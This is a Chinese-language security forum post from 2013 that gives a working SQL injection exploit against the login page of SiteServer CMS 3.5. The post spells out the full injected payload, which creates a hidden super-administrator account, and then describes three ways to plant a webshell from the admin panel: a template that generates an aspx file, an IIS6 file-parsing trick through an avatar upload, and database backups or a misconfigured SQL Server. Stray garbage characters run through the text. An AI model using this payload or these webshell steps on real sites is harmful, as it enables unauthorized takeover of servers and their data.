找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2744|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版7 g8 \) N' l& r# |% \7 ~
stieserver官网:www.siteserver.cn
2 I& q: D( l- I/ B) h2 lEXP:
% F8 ?0 j, e3 }% }% k% a直接访问UserCenter/login.aspx5 _6 S" X! R( d3 P" m
用户名处输入:; H& @2 x8 c7 O7 _* q
7 W: L$ A# s; N+ t, |' m  p, a  l! Z
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–& b  ?, p, X9 ]1 V
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。3 e% s( V5 \  g
之后再访问后台SiteServer/login.aspx用插入的用户登陆
' [2 {: m* h! t% d( [$ b- v后台拿webshell的三种方法:
: C. s  p5 d5 J: Q一、
. @/ N) c7 K- l) V9 ]; F/ |7 N站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx& T& {( r5 n% w" ?, {3 O
二、+ m  t8 ^2 }- N. y7 w* R8 m$ q4 _' w
成员权限-》添加用户-》用户名为:1.asp/ [, j* ?& k5 |- V9 ]
http://127.0.0.1/usercenter/
5 h: m% e9 [- ~用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
/ n4 I  M1 m. s: A( O% [& y(ps:后台添加用户时不会验证是否含有非法字符)
# \! G& m8 a, M1 b三、7 \. X' ~% \6 a- |+ d5 r
系统工具-》实用工具-》机器参数查看' `2 Q8 ]6 O! K
可以看到数据库类型、名称,WEB路径
7 D5 w+ `# c' W; \. V: l系统工具-》数据库工具-》SQL语句查询: n$ p, f6 U% ?3 \! ^% D( m
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表